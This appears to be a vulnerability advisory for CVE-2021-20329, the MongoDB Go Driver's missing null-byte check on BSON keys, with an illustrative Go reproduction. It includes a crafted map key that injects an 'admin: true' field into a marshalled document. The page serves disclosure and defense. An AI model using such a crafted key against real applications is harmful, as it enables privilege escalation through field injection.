CVE-2021-20329
Vulnerability Summary
Description
BSON element names (keys) are encoded as cstrings, so a key ends at the first null byte (0x00). Before version 1.5.1 the MongoDB Go Driver did not validate keys for embedded null bytes when marshalling Go objects into BSON. A key containing a null byte, most realistically a map key taken from untrusted input, is copied into the document verbatim; every BSON reader stops the key at the null byte and parses whatever follows it as further elements, so a malicious user who controls a key can inject additional fields into the marshalled document (CWE-20, CWE-1287). This issue affects all MongoDB Go Driver releases prior to and including 1.5.0; version 1.5.1 (GODRIVER-1923, PR #622) rejects keys containing a null byte.
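The Go program below is an added example and is not code from the MongoDB Go Driver, from the fix, or from this advisory. It reproduces the mechanism with a minimal BSON encoder and reader limited to string and bool values: AppendKey with validate=false copies a key verbatim as the driver did before 1.5.1, AppendKey with validate=true rejects a key containing a null byte as 1.5.1 does, and CraftedKey is a constructed attacker-controlled map key. The function names, the crafted key and the sample values are assumptions for illustration only.

```go
package main

import (
	"bytes"
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// Pair is one element to marshal; only string and bool values are supported.
type Pair struct {
	Key   string
	Value interface{}
}

// AppendKey appends a BSON cstring key (bytes plus terminating NUL). validate=false
// copies the key verbatim like the pre-1.5.1 driver; validate=true rejects NUL like 1.5.1.
func AppendKey(dst []byte, key string, validate bool) ([]byte, error) {
	if validate && strings.IndexByte(key, 0) != -1 {
		return nil, errors.New("BSON element key cannot contain a null byte")
	}
	return append(append(dst, key...), 0), nil
}

func appendInt32(dst []byte, n int) []byte {
	var b [4]byte
	binary.LittleEndian.PutUint32(b[:], uint32(n))
	return append(dst, b[:]...)
}

// Marshal encodes pairs as a BSON document: int32 total length, elements, NUL.
func Marshal(pairs []Pair, validate bool) ([]byte, error) {
	var body []byte
	var err error
	for _, p := range pairs {
		switch v := p.Value.(type) {
		case string: // type 0x02: int32 length including NUL, bytes, NUL
			if body, err = AppendKey(append(body, 0x02), p.Key, validate); err != nil {
				return nil, err
			}
			body = append(append(appendInt32(body, len(v)+1), v...), 0)
		case bool: // type 0x08: one byte, 0 or 1 (false yields the zero byte)
			if body, err = AppendKey(append(body, 0x08), p.Key, validate); err != nil {
				return nil, err
			}
			body = append(body, map[bool]byte{true: 1}[v])
		default:
			return nil, fmt.Errorf("unsupported value type %T", p.Value)
		}
	}
	return append(append(appendInt32(nil, len(body)+5), body...), 0), nil
}

// Decode walks the document as any BSON reader does: a key ends at the first NUL.
func Decode(doc []byte) ([]Pair, error) {
	if len(doc) < 5 || int(binary.LittleEndian.Uint32(doc)) != len(doc) || doc[len(doc)-1] != 0 {
		return nil, errors.New("bad document framing")
	}
	var out []Pair
	i := 4
	for doc[i] != 0 {
		typ := doc[i]
		end := bytes.IndexByte(doc[i+1:], 0)
		if end < 0 {
			return nil, errors.New("unterminated key")
		}
		key := string(doc[i+1 : i+1+end])
		i += end + 2
		switch {
		case typ == 0x02 && i+4 <= len(doc):
			n := int(binary.LittleEndian.Uint32(doc[i:]))
			i += 4
			if n < 1 || i+n > len(doc) || doc[i+n-1] != 0 {
				return nil, errors.New("bad string length")
			}
			out = append(out, Pair{key, string(doc[i : i+n-1])})
			i += n
		case typ == 0x08 && i < len(doc):
			out = append(out, Pair{key, doc[i] == 1})
			i++
		default:
			return nil, fmt.Errorf("bad or unsupported element type 0x%02x", typ)
		}
		if i >= len(doc) {
			return nil, errors.New("element runs past the end of the document")
		}
	}
	return out, nil
}

// CraftedKey is a constructed attacker-controlled map key. A reader stops the key
// at the first NUL and parses the remaining bytes as BSON:
//   "user" NUL              key "user"
//   int32(1) NUL            empty-string value for "user"
//   0x08 "admin" NUL 0x01   injected element admin: true
//   0x02 "role"             string element whose key is closed by the NUL the
//                           encoder appends and whose value is the real value
const CraftedKey = "user\x00" + "\x01\x00\x00\x00\x00" + "\x08admin\x00\x01" + "\x02role"
```

Marshalling {CraftedKey: "alice", "verified": false} without validation yields a well-framed document that decodes as user: "", admin: true, role: "alice", verified: false; with validation it fails before any bytes are written. Upgrading to 1.5.1 or later is the fix, but keys that originate from untrusted input should still be validated by the application before they reach the marshaller. Note also that BSON uses cstrings for other fields, such as the pattern and options of a regular expression, so any code that builds those from untrusted input has the same property to check.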
CVSS Metrics
- v3.1 • MEDIUM • Score: 6.8 • CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N
- v3.1 • MEDIUM • Score: 6.5 • CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
- v2.0 • MEDIUM • Score: 4.0 • AV:N/AC:L/Au:S/C:N/I:P/A:N
EPSS Trends
Current EPSS score: 0.14% • Percentile: 34%
Techniques & Countermeasures
- CWE-20 • Improper Input Validation
The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
- CWE-1287 • Improper Validation of Specified Type of Input
The product receives input that is expected to be of a certain type, but it does not validate or incorrectly validates that the input is actually of the expected type.
Affected Systems
- go.mongodb.org • mongo-driver
< 1.5.1
- mongodb inc. • mongodb go driver
≥ 1.0, ≤ 1.5.0
- mongodb • go_driver
≤ 1.5.0
References (7)
- https://github.com/mongodb/mongo-go-driver/releases/tag/v1.5.1
- https://nvd.nist.gov/vuln/detail/CVE-2021-20329
- https://github.com/mongodb/mongo-go-driver/pull/622
- https://github.com/mongodb/mongo-go-driver/commit/2aca31d5986a9e1c65a92264736de9fdc3b9b4ca
- https://github.com/mongodb/mongo-go-driver
- https://jira.mongodb.org/browse/GODRIVER-1923
- https://pkg.go.dev/vuln/GO-2021-0112